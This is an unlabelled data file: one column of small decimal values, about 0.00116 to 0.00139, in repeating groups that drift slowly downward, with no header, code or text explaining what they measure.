0.00138241
0.00138628
0.00138616
0.00138217
0.00138607
0.0013822
0.00138231
0.00137727
0.00137749
0.00137366
0.00137345
0.00137727
0.00137749
0.00137366
0.00138226
0.00138266
0.00138605
0.00138605
0.00138621
0.00138242
0.00138242
0.00135991
0.0013595
0.00135612
0.00135612
0.00135596
0.00135975
0.00135975
0.0013472
0.00134758
0.00135098
0.00135098
0.00135114
0.00134735
0.00134735
0.00135973
0.00135995
0.00135591
0.00135612
0.00135996
0.00135974
0.00135612
0.00136486
0.00136862
0.00136874
0.00136463
0.00136466
0.00136853
0.00136477
0.0013649
0.00136469
0.00136872
0.00136849
0.00136468
0.0013685
0.00136489
0.00135976
0.0013559
0.00136
0.001356
0.00135997
0.00135986
0.00135609
0.00135973
0.00135995
0.00135591
0.00135612
0.00135995
0.00135974
0.00135612
0.00136486
0.00136862
0.00136874
0.00136463
0.00136853
0.00136466
0.00136477
0.0013649
0.00136469
0.00136872
0.00136849
0.0013685
0.00136468
0.00136489
0.00135976
0.00135589
0.00136
0.001356
0.00135997
0.00135609
0.00135986
0.00134736
0.00135118
0.00135096
0.00134715
0.00135096
0.00134715
0.00134735
0.00134223
0.00133846
0.00134247
0.00133836
0.00134232
0.00134244
0.00133855
0.00134733
0.0013512
0.00135108
0.00134709
0.00134723
0.00135099
0.00134713
0.00134219
0.00134242
0.00133838
0.00133859
0.00134243
0.0013422
0.00133859
0.00134736
0.00135118
0.00135096
0.00134715
0.00135096
0.00134714
0.00134735
0.00134223
0.00133846
0.00134247
0.00133836
0.00134244
0.00134232
0.00133856
0.00134733
0.0013512
0.00135108
0.00134709
0.001351
0.00134713
0.00134723
0.00134219
0.00134241
0.00133838
0.00133859
0.00134242
0.0013422
0.00133859
0.00135991
0.0013595
0.00135612
0.00135612
0.00135975
0.00135976
0.00135596
0.00134719
0.00134759
0.00135098
0.00135098
0.00134735
0.00135114
0.00134735
0.00135973
0.00135995
0.00135591
0.00135612
0.00135996
0.00135973
0.00135612
0.00136486
0.00136862
0.00136874
0.00136463
0.00136466
0.00136853
0.00136477
0.0013649
0.00136469
0.00136872
0.00136849
0.00136468
0.0013685
0.00136489
0.00135976
0.0013559
0.00136001
0.001356
0.00135998
0.00135986
0.00135609
0.00135973
0.00135995
0.00135612
0.00135591
0.00135973
0.00135996
0.00135612
0.00136487
0.00136862
0.00136874
0.00136462
0.00136854
0.00136467
0.00136477
0.0013649
0.00136469
0.00136849
0.00136872
0.0013685
0.00136489
0.00136468
0.00135976
0.0013559
0.00136
0.001356
0.00135998
0.00135609
0.00135986
0.00134736
0.00135118
0.00135096
0.00134715
0.00135095
0.00134714
0.00134735
0.00134223
0.00133846
0.00134247
0.00133836
0.00134232
0.00134243
0.00133856
0.00134733
0.0013512
0.00135108
0.00134709
0.00134723
0.00135099
0.00134712
0.00134219
0.00134242
0.00133838
0.00133859
0.00134242
0.0013422
0.00133859
0.00134736
0.00135096
0.00135118
0.00134715
0.00135096
0.00134735
0.00134714
0.00134223
0.00133846
0.00134247
0.00133836
0.00134244
0.00134232
0.00133855
0.00134733
0.0013512
0.00135108
0.00134709
0.00135099
0.00134713
0.00134723
0.00134219
0.00134241
0.00133859
0.00133838
0.0013422
0.00134242
0.00133859
0.00135973
0.00135995
0.00135612
0.00135591
0.00135974
0.00135996
0.00135612
0.00136487
0.00136862
0.00136874
0.00136463
0.00136477
0.00136853
0.00136466
0.0013649
0.00136469
0.0013685
0.00136872
0.00136489
0.0013685
0.00136469
0.00135976
0.0013559
0.00136
0.001356
0.00135986
0.00135997
0.00135609
0.00134736
0.00135118
0.00135096
0.00134715
0.00135096
0.00134714
0.00134735
0.00134223
0.00133847
0.00134247
0.00133836
0.00133856
0.00134232
0.00134244
0.00134733
0.0013512
0.00135109
0.00134709
0.001351
0.00134723
0.00134713
0.00134219
0.00134242
0.00133838
0.00133859
0.00133859
0.00134242
0.0013422
0.00134736
0.00135096
0.00135118
0.00134715
0.00135096
0.00134735
0.00134715
0.00134223
0.00133846
0.00134246
0.00133836
0.00134244
0.00134232
0.00133856
0.00134733
0.0013512
0.00135109
0.00134709
0.001351
0.00134713
0.00134723
0.00134219
0.00134242
0.00133859
0.00133838
0.0013422
0.00134242
0.00133859
0.00135991
0.0013595
0.00135612
0.00135612
0.00135976
0.00135976
0.00135596
0.00134719
0.00134758
0.00135098
0.00135098
0.00134735
0.00135114
0.00134735
0.00135973
0.00135995
0.00135612
0.00135591
0.00135974
0.00135996
0.00135612
0.00136487
0.00136862
0.00136874
0.00136463
0.00136477
0.00136853
0.00136467
0.0013649
0.00136469
0.0013685
0.00136872
0.0013649
0.0013685
0.00136469
0.00135977
0.0013559
0.00136
0.001356
0.00135986
0.00135998
0.00135609
0.00134736
0.00135096
0.00135118
0.00134715
0.00135096
0.00134735
0.00134715
0.00134223
0.00133847
0.00134247
0.00133836
0.00133856
0.00134232
0.00134244
0.00134733
0.0013512
0.00135108
0.00134709
0.001351
0.00134723
0.00134713
0.0013422
0.00134242
0.0013386
0.00133838
0.0013386
0.00134221
0.00134242
0.00134736
0.00135096
0.00135118
0.00134715
0.00135096
0.00134735
0.00134715
0.00134223
0.00133847
0.00134247
0.00133836
0.00134244
0.00134232
0.00133856
0.00134733
0.0013512
0.00135109
0.00134709
0.001351
0.00134713
0.00134723
0.0013422
0.00134242
0.0013386
0.00133838
0.00134221
0.00134242
0.00133859
0.0013472
0.00134759
0.00135099
0.00135099
0.00135114
0.00134735
0.00134736
0.00132483
0.00132442
0.00132104
0.00132104
0.00132088
0.00132468
0.00132468
0.00131212
0.00131251
0.0013159
0.0013159
0.00131606
0.00131227
0.00131227
0.00132466
0.00132488
0.00132084
0.00132105
0.00132488
0.00132466
0.00132105
0.00132979
0.00133355
0.00133367
0.00132956
0.00132959
0.00133345
0.00132969
0.00132983
0.00132962
0.00133365
0.00133342
0.00132961
0.00133342
0.00132982
0.00132469
0.00132082
0.00132493
0.00132092
0.0013249
0.00132478
0.00132101
0.00132466
0.00132488
0.00132084
0.00132105
0.00132488
0.00132466
0.00132105
0.00132979
0.00133355
0.00133366
0.00132955
0.00133346
0.00132959
0.00132969
0.00132983
0.00132962
0.00133364
0.00133342
0.00133343
0.00132961
0.00132982
0.00132469
0.00132083
0.00132493
0.00132093
0.0013249
0.00132102
0.00132478
0.00131228
0.00131611
0.00131588
0.00131207
0.00131588
0.00131207
0.00131227
0.00130715
0.00130338
0.00130739
0.00130328
0.00130724
0.00130736
0.00130347
0.00131225
0.00131613
0.00131601
0.00131202
0.00131215
0.00131592
0.00131205
0.00130712
0.00130734
0.0013033
0.00130351
0.00130734
0.00130712
0.00130351
0.00131228
0.00131611
0.00131588
0.00131207
0.00131588
0.00131207
0.00131227
0.00130715
0.00130338
0.00130739
0.00130328
0.00130736
0.00130724
0.00130347
0.00131225
0.00131614
0.00131601
0.00131202
0.00131592
0.00131206
0.00131216
0.00130711
0.00130734
0.0013033
0.00130351
0.00130734
0.00130712
0.0013035
0.00132484
0.00132443
0.00132105
0.00132105
0.00132468
0.00132468
0.00132088
0.00131211
0.00131251
0.0013159
0.0013159
0.00131227
0.00131606
0.00131227
0.00132466
0.00132488
0.00132084
0.00132104
0.00132488
0.00132466
0.00132105
0.00132979
0.00133355
0.00133367
0.00132956
0.00132959
0.00133346
0.00132969
0.00132983
0.00132961
0.00133365
0.00133342
0.00132961
0.00133343
0.00132982
0.00132469
0.00132082
0.00132493
0.00132093
0.0013249
0.00132478
0.00132102
0.00132466
0.00132488
0.00132104
0.00132084
0.00132466
0.00132488
0.00132105
0.00132979
0.00133355
0.00133367
0.00132956
0.00133346
0.00132959
0.00132969
0.00132983
0.00132962
0.00133342
0.00133365
0.00133342
0.00132982
0.00132961
0.00132469
0.00132082
0.00132493
0.00132093
0.0013249
0.00132102
0.00132478
0.00131228
0.00131611
0.00131588
0.00131207
0.00131588
0.00131207
0.00131227
0.00130715
0.00130338
0.00130739
0.00130328
0.00130724
0.00130736
0.00130348
0.00131225
0.00131613
0.00131601
0.00131202
0.00131216
0.00131592
0.00131205
0.00130711
0.00130734
0.0013033
0.00130351
0.00130734
0.00130712
0.00130351
0.00131228
0.00131588
0.00131611
0.00131207
0.00131588
0.00131228
0.00131207
0.00130715
0.00130338
0.00130739
0.00130328
0.00130736
0.00130724
0.00130348
0.00131226
0.00131613
0.00131601
0.00131202
0.00131592
0.00131205
0.00131216
0.00130712
0.00130734
0.00130351
0.0013033
0.00130712
0.00130734
0.00130351
0.00132466
0.00132488
0.00132105
0.00132083
0.00132466
0.00132488
0.00132105
0.00132979
0.00133355
0.00133367
0.00132955
0.00132969
0.00133346
0.00132959
0.00132983
0.00132962
0.00133342
0.00133365
0.00132982
0.00133343
0.00132961
0.00132469
0.00132082
0.00132493
0.00132092
0.00132478
0.00132489
0.00132102
0.00131229
0.00131611
0.00131588
0.00131207
0.00131589
0.00131207
0.00131227
0.00130715
0.00130339
0.00130739
0.00130328
0.00130348
0.00130724
0.00130736
0.00131225
0.00131613
0.00131601
0.00131202
0.00131592
0.00131216
0.00131205
0.00130712
0.00130734
0.0013033
0.00130351
0.00130352
0.00130734
0.00130712
0.00131228
0.00131588
0.0013161
0.00131207
0.00131588
0.00131228
0.00131206
0.00130715
0.00130338
0.00130739
0.00130328
0.00130736
0.00130724
0.00130348
0.00131225
0.00131612
0.00131601
0.00131201
0.00131592
0.00131205
0.00131215
0.00130711
0.00130734
0.00130351
0.0013033
0.00130712
0.00130734
0.00130351
0.00132483
0.00132442
0.00132104
0.00132104
0.00132468
0.00132468
0.00132088
0.00131212
0.00131251
0.0013159
0.0013159
0.00131227
0.00131606
0.00131227
0.00132466
0.00132488
0.00132105
0.00132084
0.00132467
0.00132489
0.00132105
0.0013298
0.00133355
0.00133367
0.00132955
0.0013297
0.00133346
0.00132959
0.00132983
0.00132962
0.00133343
0.00133365
0.00132982
0.00133343
0.00132961
0.00132469
0.00132082
0.00132493
0.00132093
0.00132478
0.0013249
0.00132102
0.00131228
0.00131588
0.00131611
0.00131207
0.00131588
0.00131227
0.00131207
0.00130715
0.00130339
0.0013074
0.00130329
0.00130348
0.00130725
0.00130736
0.00131225
0.00131613
0.00131601
0.00131202
0.00131592
0.00131216
0.00131205
0.00130712
0.00130734
0.00130351
0.0013033
0.00130351
0.00130712
0.00130734
0.00131229
0.00131588
0.00131611
0.00131208
0.00131589
0.00131227
0.00131207
0.00130715
0.00130339
0.0013074
0.00130328
0.00130737
0.00130725
0.00130348
0.00131226
0.00131613
0.00131601
0.00131202
0.00131592
0.00131206
0.00131216
0.00130711
0.00130734
0.00130351
0.0013033
0.00130712
0.00130735
0.00130351
0.00131212
0.00131251
0.00131591
0.00131591
0.00131607
0.00131227
0.00131227
0.00128975
0.00128934
0.00128596
0.00128596
0.0012858
0.00128959
0.00128959
0.00127703
0.00127743
0.00128082
0.00128082
0.00128097
0.00127719
0.00127718
0.00128957
0.0012898
0.00128575
0.00128597
0.0012898
0.00128958
0.00128596
0.00129471
0.00129847
0.00129858
0.00129447
0.00129451
0.00129837
0.00129461
0.00129474
0.00129453
0.00129856
0.00129834
0.00129453
0.00129835
0.00129474
0.0012896
0.00128574
0.00128985
0.00128584
0.00128982
0.0012897
0.00128593
0.00128957
0.00128979
0.00128575
0.00128596
0.0012898
0.00128958
0.00128597
0.00129471
0.00129847
0.00129859
0.00129447
0.00129838
0.00129451
0.00129461
0.00129475
0.00129453
0.00129857
0.00129834
0.00129834
0.00129453
0.00129474
0.00128961
0.00128574
0.00128985
0.00128584
0.00128982
0.00128593
0.0012897
0.0012772
0.00128102
0.0012808
0.00127698
0.0012808
0.00127698
0.00127719
0.00127207
0.0012683
0.0012723
0.0012682
0.00127216
0.00127227
0.00126839
0.00127717
0.00128104
0.00128093
0.00127693
0.00127707
0.00128083
0.00127697
0.00127203
0.00127225
0.00126821
0.00126842
0.00127225
0.00127203
0.00126842
0.0012772
0.00128102
0.0012808
0.00127699
0.0012808
0.00127698
0.00127719
0.00127206
0.0012683
0.00127231
0.00126819
0.00127227
0.00127215
0.00126839
0.00127717
0.00128104
0.00128092
0.00127693
0.00128083
0.00127696
0.00127707
0.00127203
0.00127225
0.00126821
0.00126842
0.00127225
0.00127203
0.00126842
0.00128975
0.00128934
0.00128596
0.00128596
0.00128959
0.00128959
0.0012858
0.00127703
0.00127743
0.00128082
0.00128082
0.00127719
0.00128098
0.00127719
0.00128958
0.0012898
0.00128576
0.00128597
0.0012898
0.00128958
0.00128597
0.00129471
0.00129847
0.00129859
0.00129447
0.00129451
0.00129838
0.00129461
0.00129475
0.00129454
0.00129856
0.00129834
0.00129453
0.00129834
0.00129474
0.00128961
0.00128574
0.00128984
0.00128584
0.00128982
0.0012897
0.00128594
0.00128958
0.0012898
0.00128597
0.00128576
0.00128958
0.0012898
0.00128597
0.00129471
0.00129847
0.00129859
0.00129447
0.00129838
0.00129451
0.00129461
0.00129475
0.00129454
0.00129835
0.00129857
0.00129835
0.00129474
0.00129453
0.00128961
0.00128574
0.00128985
0.00128585
0.00128982
0.00128594
0.0012897
0.0012772
0.00128102
0.0012808
0.00127699
0.0012808
0.00127698
0.00127719
0.00127206
0.0012683
0.0012723
0.00126819
0.00127216
0.00127227
0.00126839
0.00127717
0.00128105
0.00128092
0.00127693
0.00127707
0.00128084
0.00127697
0.00127203
0.00127225
0.00126821
0.00126842
0.00127225
0.00127203
0.00126842
0.0012772
0.0012808
0.00128103
0.00127699
0.0012808
0.00127719
0.00127699
0.00127207
0.0012683
0.00127231
0.0012682
0.00127228
0.00127216
0.00126839
0.00127717
0.00128105
0.00128093
0.00127694
0.00128084
0.00127698
0.00127708
0.00127203
0.00127225
0.00126842
0.00126822
0.00127204
0.00127226
0.00126842
0.00128957
0.0012898
0.00128596
0.00128575
0.00128958
0.0012898
0.00128596
0.00129471
0.00129847
0.00129858
0.00129447
0.00129461
0.00129838
0.00129451
0.00129474
0.00129453
0.00129834
0.00129856
0.00129474
0.00129834
0.00129453
0.0012896
0.00128573
0.00128985
0.00128584
0.0012897
0.00128981
0.00128593
0.00127719
0.00128102
0.0012808
0.00127699
0.0012808
0.00127698
0.00127719
0.00127206
0.0012683
0.00127231
0.0012682
0.00126839
0.00127216
0.00127228
0.00127717
0.00128104
0.00128092
0.00127693
0.00128083
0.00127707
0.00127697
0.00127202
0.00127225
0.00126822
0.00126843
0.00126842
0.00127226
0.00127204
0.0012772
0.00128079
0.00128102
0.00127699
0.0012808
0.00127719
0.00127698
0.00127206
0.0012683
0.00127231
0.00126819
0.00127227
0.00127216
0.00126839
0.00127717
0.00128104
0.00128092
0.00127693
0.00128083
0.00127696
0.00127707
0.00127203
0.00127225
0.00126843
0.00126821
0.00127204
0.00127226
0.00126842
0.00128975
0.00128934
0.00128596
0.00128596
0.0012896
0.0012896
0.0012858
0.00127704
0.00127743
0.00128082
0.00128083
0.00127719
0.00128098
0.00127719
0.00128957
0.00128979
0.00128596
0.00128575
0.00128958
0.0012898
0.00128596
0.00129471
0.00129847
0.00129859
0.00129447
0.00129461
0.00129838
0.00129451
0.00129474
0.00129453
0.00129834
0.00129857
0.00129474
0.00129834
0.00129453
0.00128961
0.00128574
0.00128985
0.00128584
0.0012897
0.00128982
0.00128593
0.0012772
0.0012808
0.00128102
0.00127698
0.0012808
0.00127719
0.00127698
0.00127206
0.0012683
0.0012723
0.0012682
0.00126839
0.00127216
0.00127228
0.00127717
0.00128104
0.00128092
0.00127693
0.00128084
0.00127707
0.00127696
0.00127203
0.00127225
0.00126843
0.00126821
0.00126843
0.00127204
0.00127225
0.0012772
0.0012808
0.00128102
0.00127699
0.0012808
0.00127719
0.00127699
0.00127206
0.0012683
0.00127231
0.00126819
0.00127227
0.00127216
0.00126839
0.00127717
0.00128104
0.00128092
0.00127693
0.00128084
0.00127697
0.00127707
0.00127203
0.00127225
0.00126842
0.00126822
0.00127203
0.00127226
0.00126842
0.00127703
0.00127743
0.00128082
0.00128082
0.00128098
0.00127718
0.00127718
0.00125466
0.00125425
0.00125087
0.00125087
0.00125071
0.00125451
0.00125451
0.00124195
0.00124234
0.00124573
0.00124573
0.00124589
0.0012421
0.0012421
0.00125448
0.00125471
0.00125067
0.00125087
0.00125471
0.00125449
0.00125087
0.00125962
0.00126338
0.0012635
0.00125938
0.00125942
0.00126329
0.00125952
0.00125965
0.00125945
0.00126348
0.00126325
0.00125944
0.00126325
0.00125965
0.00125452
0.00125065
0.00125476
0.00125075
0.00125473
0.00125461
0.00125084
0.00125449
0.00125471
0.00125066
0.00125087
0.00125471
0.00125449
0.00125087
0.00125962
0.00126338
0.0012635
0.00125938
0.00126329
0.00125942
0.00125952
0.00125966
0.00125945
0.00126348
0.00126325
0.00126326
0.00125944
0.00125965
0.00125452
0.00125064
0.00125476
0.00125075
0.00125473
0.00125084
0.00125461
0.00124211
0.00124593
0.0012457
0.0012419
0.00124571
0.00124189
0.0012421
0.00123697
0.0012332
0.00123721
0.0012331
0.00123707
0.00123718
0.0012333
0.00124208
0.00124595
0.00124584
0.00124184
0.00124198
0.00124575
0.00124187
0.00123694
0.00123716
0.00123312
0.00123333
0.00123716
0.00123694
0.00123333
0.0012421
0.00124593
0.0012457
0.00124189
0.0012457
0.00124189
0.0012421
0.00123697
0.0012332
0.00123721
0.0012331
0.00123718
0.00123706
0.0012333
0.00124207
0.00124595
0.00124583
0.00124184
0.00124574
0.00124187
0.00124198
0.00123694
0.00123716
0.00123312
0.00123333
0.00123716
0.00123694
0.00123333
0.00125466
0.00125425
0.00125087
0.00125087
0.00125451
0.0012545
0.00125071
0.00124194
0.00124233
0.00124572
0.00124572
0.00124209
0.00124589
0.00124209
0.00125449
0.00125471
0.00125067
0.00125087
0.00125471
0.00125449
0.00125088
0.00125962
0.00126338
0.0012635
0.00125938
0.00125942
0.00126329
0.00125953
0.00125966
0.00125945
0.00126348
0.00126325
0.00125944
0.00126326
0.00125965
0.00125452
0.00125065
0.00125476
0.00125075
0.00125473
0.00125461
0.00125085
0.00125448
0.00125471
0.00125087
0.00125066
0.00125449
0.00125471
0.00125087
0.00125962
0.00126338
0.0012635
0.00125939
0.00126329
0.00125942
0.00125952
0.00125965
0.00125945
0.00126325
0.00126348
0.00126325
0.00125965
0.00125944
0.00125451
0.00125065
0.00125476
0.00125075
0.00125473
0.00125084
0.00125461
0.00124211
0.00124594
0.00124571
0.0012419
0.00124571
0.00124189
0.0012421
0.00123697
0.00123321
0.00123721
0.0012331
0.00123707
0.00123718
0.0012333
0.00124208
0.00124596
0.00124584
0.00124184
0.00124198
0.00124575
0.00124188
0.00123694
0.00123716
0.00123312
0.00123333
0.00123717
0.00123695
0.00123333
0.00124211
0.00124571
0.00124593
0.0012419
0.00124571
0.0012421
0.00124189
0.00123697
0.00123321
0.00123721
0.0012331
0.00123718
0.00123706
0.0012333
0.00124208
0.00124595
0.00124583
0.00124184
0.00124574
0.00124187
0.00124198
0.00123694
0.00123716
0.00123333
0.00123312
0.00123694
0.00123716
0.00123333
0.00125448
0.0012547
0.00125087
0.00125066
0.00125449
0.00125471
0.00125087
0.00125962
0.00126338
0.0012635
0.00125938
0.00125952
0.00126329
0.00125942
0.00125965
0.00125944
0.00126326
0.00126348
0.00125965
0.00126326
0.00125944
0.00125451
0.00125064
0.00125476
0.00125075
0.00125461
0.00125472
0.00125084
0.0012421
0.00124593
0.0012457
0.00124189
0.00124571
0.00124189
0.00124209
0.00123697
0.0012332
0.00123722
0.0012331
0.0012333
0.00123706
0.00123718
0.00124207
0.00124595
0.00124583
0.00124184
0.00124574
0.00124198
0.00124188
0.00123693
0.00123716
0.00123312
0.00123333
0.00123333
0.00123716
0.00123694
0.0012421
0.0012457
0.00124593
0.00124189
0.00124571
0.0012421
0.00124189
0.00123697
0.0012332
0.00123721
0.0012331
0.00123718
0.00123707
0.00123329
0.00124207
0.00124595
0.00124583
0.00124184
0.00124574
0.00124187
0.00124198
0.00123694
0.00123716
0.00123333
0.00123312
0.00123695
0.00123716
0.00123333
0.00125466
0.00125425
0.00125087
0.00125087
0.00125451
0.0012545
0.00125071
0.00124194
0.00124234
0.00124573
0.00124573
0.0012421
0.00124589
0.0012421
0.00125448
0.0012547
0.00125087
0.00125066
0.00125449
0.00125471
0.00125087
0.00125962
0.00126338
0.0012635
0.00125938
0.00125952
0.00126329
0.00125942
0.00125965
0.00125944
0.00126325
0.00126348
0.00125965
0.00126326
0.00125944
0.00125451
0.00125064
0.00125476
0.00125075
0.00125461
0.00125472
0.00125084
0.0012421
0.00124571
0.00124593
0.00124189
0.0012457
0.0012421
0.00124189
0.00123697
0.0012332
0.00123721
0.0012331
0.0012333
0.00123706
0.00123718
0.00124207
0.00124595
0.00124583
0.00124184
0.00124574
0.00124198
0.00124187
0.00123693
0.00123716
0.00123333
0.00123312
0.00123333
0.00123694
0.00123716
0.0012421
0.00124571
0.00124593
0.00124189
0.00124571
0.0012421
0.00124189
0.00123697
0.0012332
0.00123721
0.0012331
0.00123718
0.00123706
0.00123329
0.00124207
0.00124595
0.00124583
0.00124184
0.00124574
0.00124187
0.00124198
0.00123693
0.00123716
0.00123333
0.00123312
0.00123694
0.00123716
0.00123333
0.00124194
0.00124233
0.00124573
0.00124572
0.00124589
0.00124209
0.00124209
0.00121957
0.00121915
0.00121577
0.00121577
0.00121561
0.00121941
0.00121941
0.00120684
0.00120724
0.00121063
0.00121063
0.00121079
0.001207
0.001207
0.00121939
0.00121961
0.00121557
0.00121578
0.00121962
0.0012194
0.00121578
0.00122453
0.00122829
0.0012284
0.00122429
0.00122432
0.0012282
0.00122443
0.00122456
0.00122435
0.00122839
0.00122816
0.00122435
0.00122817
0.00122456
0.00121942
0.00121555
0.00121967
0.00121565
0.00121963
0.00121952
0.00121575
0.00121939
0.00121961
0.00121557
0.00121578
0.00121962
0.00121939
0.00121578
0.00122453
0.00122829
0.0012284
0.00122429
0.0012282
0.00122433
0.00122443
0.00122456
0.00122435
0.00122839
0.00122816
0.00122817
0.00122435
0.00122455
0.00121942
0.00121555
0.00121966
0.00121566
0.00121964
0.00121574
0.00121952
0.00120701
0.00121083
0.00121061
0.0012068
0.00121061
0.00120679
0.001207
0.00120187
0.00119811
0.00120212
0.001198
0.00120197
0.00120208
0.0011982
0.00120698
0.00121085
0.00121074
0.00120674
0.00120688
0.00121065
0.00120677
0.00120184
0.00120206
0.00119802
0.00119823
0.00120206
0.00120184
0.00119823
0.00120701
0.00121083
0.00121061
0.0012068
0.00121061
0.00120679
0.001207
0.00120187
0.00119811
0.00120211
0.001198
0.00120208
0.00120197
0.0011982
0.00120698
0.00121085
0.00121073
0.00120674
0.00121064
0.00120678
0.00120688
0.00120184
0.00120206
0.00119802
0.00119823
0.00120207
0.00120185
0.00119823
0.00121956
0.00121916
0.00121577
0.00121577
0.00121941
0.00121941
0.00121561
0.00120684
0.00120723
0.00121063
0.00121063
0.00120699
0.00121079
0.00120699
0.0012194
0.00121962
0.00121557
0.00121578
0.00121962
0.0012194
0.00121578
0.00122453
0.00122829
0.00122841
0.00122429
0.00122433
0.0012282
0.00122443
0.00122457
0.00122435
0.00122839
0.00122816
0.00122435
0.00122816
0.00122456
0.00121942
0.00121556
0.00121967
0.00121566
0.00121964
0.00121952
0.00121575
0.00121939
0.00121961
0.00121578
0.00121557
0.0012194
0.00121962
0.00121578
0.00122453
0.00122829
0.00122841
0.00122429
0.0012282
0.00122433
0.00122443
0.00122456
0.00122435
0.00122816
0.00122838
0.00122816
0.00122456
0.00122435
0.00121942
0.00121555
0.00121967
0.00121566
0.00121964
0.00121575
0.00121952
0.00120701
0.00121084
0.00121061
0.0012068
0.00121061
0.0012068
0.001207
0.00120187
0.00119811
0.00120212
0.001198
0.00120197
0.00120209
0.0011982
0.00120698
0.00121086
0.00121074
0.00120675
0.00120689
0.00121065
0.00120678
0.00120184
0.00120206
0.00119802
0.00119823
0.00120207
0.00120185
0.00119823
0.00120701
0.00121061
0.00121084
0.0012068
0.00121061
0.001207
0.0012068
0.00120187
0.00119811
0.00120212
0.001198
0.00120208
0.00120197
0.0011982
0.00120698
0.00121086
0.00121074
0.00120674
0.00121065
0.00120678
0.00120688
0.00120184
0.00120206
0.00119823
0.00119802
0.00120185
0.00120207
0.00119823
0.00121939
0.00121961
0.00121577
0.00121557
0.00121939
0.00121962
0.00121577
0.00122452
0.00122829
0.0012284
0.00122429
0.00122443
0.00122819
0.00122433
0.00122456
0.00122435
0.00122816
0.00122838
0.00122455
0.00122816
0.00122434
0.00121942
0.00121556
0.00121967
0.00121566
0.00121951
0.00121964
0.00121575
0.00120701
0.00121083
0.00121061
0.0012068
0.00121061
0.00120679
0.001207
0.00120187
0.00119811
0.00120211
0.001198
0.0011982
0.00120197
0.00120208
0.00120698
0.00121085
0.00121074
0.00120674
0.00121065
0.00120688
0.00120677
0.00120184
0.00120206
0.00119803
0.00119824
0.00119824
0.00120207
0.00120185
0.00120701
0.00121061
0.00121083
0.0012068
0.00121061
0.001207
0.00120679
0.00120187
0.00119811
0.00120212
0.001198
0.00120208
0.00120197
0.0011982
0.00120698
0.00121086
0.00121074
0.00120674
0.00121065
0.00120678
0.00120688
0.00120184
0.00120206
0.00119823
0.00119802
0.00120185
0.00120206
0.00119823
0.00121957
0.00121916
0.00121577
0.00121578
0.00121941
0.00121941
0.00121562
0.00120685
0.00120724
0.00121064
0.00121064
0.001207
0.0012108
0.001207
0.00121939
0.00121961
0.00121577
0.00121557
0.00121939
0.00121961
0.00121578
0.00122452
0.00122828
0.0012284
0.00122429
0.00122442
0.00122819
0.00122432
0.00122456
0.00122435
0.00122816
0.00122838
0.00122455
0.00122816
0.00122434
0.00121942
0.00121555
0.00121966
0.00121565
0.00121951
0.00121963
0.00121575
0.00120701
0.00121061
0.00121083
0.0012068
0.00121061
0.001207
0.00120679
0.00120187
0.00119811
0.00120212
0.001198
0.0011982
0.00120197
0.00120208
0.00120698
0.00121085
0.00121074
0.00120674
0.00121065
0.00120688
0.00120678
0.00120184
0.00120206
0.00119824
0.00119803
0.00119824
0.00120185
0.00120207
0.00120701
0.00121061
0.00121083
0.0012068
0.00121061
0.001207
0.00120679
0.00120187
0.00119811
0.00120212
0.001198
0.00120208
0.00120197
0.0011982
0.00120698
0.00121085
0.00121073
0.00120674
0.00121065
0.00120678
0.00120688
0.00120184
0.00120206
0.00119824
0.00119802
0.00120185
0.00120206
0.00119823
0.00120684
0.00120724
0.00121063
0.00121063
0.00121079
0.00120699
0.001207
0.00118446
0.00118406
0.00118067
0.00118067
0.00118051
0.00118431
0.00118431
0.00117174
0.00117214
0.00117553
0.00117553
0.00117569
0.0011719
0.0011719
0.00118429
0.00118451
0.00118047
0.00118068
0.00118452
0.0011843
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.00118923
0.0011931
0.00118933
0.00118946
0.00118925
0.00119329
0.00119306
0.00118925
0.00119306
0.00118946
0.00118432
0.00118045
0.00118456
0.00118055
0.00118453
0.00118442
0.00118064
0.00118429
0.00118451
0.00118047
0.00118067
0.00118451
0.00118429
0.00118068
0.00118942
0.00119319
0.0011933
0.00118919
0.00119309
0.00118922
0.00118933
0.00118946
0.00118925
0.00119328
0.00119306
0.00119306
0.00118924
0.00118945
0.00118432
0.00118045
0.00118456
0.00118055
0.00118453
0.00118064
0.00118441
0.0011719
0.00117573
0.00117551
0.00117169
0.00117551
0.00117169
0.00117189
0.00116677
0.001163
0.00116701
0.0011629
0.00116686
0.00116698
0.00116309
0.00117187
0.00117575
0.00117564
0.00117164
0.00117178
0.00117554
0.00117167
0.00116673
0.00116696
0.00116292
0.00116313
0.00116696
0.00116674
0.00116313
0.0011719
0.00117573
0.00117551
0.0011717
0.00117551
0.00117169
0.0011719
0.00116677
0.001163
0.00116701
0.0011629
0.00116698
0.00116686
0.0011631
0.00117188
0.00117575
0.00117563
0.00117164
0.00117554
0.00117168
0.00117178
0.00116674
0.00116696
0.00116292
0.00116313
0.00116697
0.00116674
0.00116313
0.00118447
0.00118406
0.00118067
0.00118068
0.00118432
0.00118431
0.00118051
0.00117174
0.00117213
0.00117553
0.00117553
0.0011719
0.00117569
0.00117189
0.00118429
0.00118451
0.00118047
0.00118068
0.00118452
0.0011843
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.00118923
0.00119309
0.00118933
0.00118946
0.00118925
0.00119329
0.00119306
0.00118925
0.00119306
0.00118946
0.00118432
0.00118045
0.00118457
0.00118056
0.00118453
0.00118442
0.00118065
0.00118429
0.00118451
0.00118068
0.00118047
0.0011843
0.00118452
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.0011931
0.00118922
0.00118933
0.00118947
0.00118925
0.00119306
0.00119329
0.00119307
0.00118946
0.00118925
0.00118432
0.00118045
0.00118457
0.00118056
0.00118453
0.00118065
0.00118442
0.00117191
0.00117573
0.00117551
0.0011717
0.00117551
0.00117169
0.0011719
0.00116677
0.001163
0.00116701
0.0011629
0.00116686
0.00116698
0.0011631
0.00117188
0.00117575
0.00117563
0.00117164
0.00117178
0.00117555
0.00117168
0.00116674
0.00116696
0.00116292
0.00116313
0.00116697
0.00116674
0.00116313
0.00117191
0.00117551
0.00117573
0.0011717
0.00117551
0.0011719
0.00117169
0.00116677
0.001163
0.00116701
0.0011629
0.00116698
0.00116687
0.0011631
0.00117188
0.00117575
0.00117564
0.00117164
0.00117555
0.00117168
0.00117178
0.00116674
0.00116696
0.00116313
0.00116292
0.00116674
0.00116696
0.00116313
0.00118429
0.00118451
0.00118068
0.00118047
0.00118429
0.00118452
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.00118933
0.0011931
0.00118923
0.00118946
0.00118925
0.00119306
0.00119329
0.00118945
0.00119307
0.00118925
0.00118432
0.00118045
0.00118456
0.00118056
0.00118442
0.00118453
0.00118065
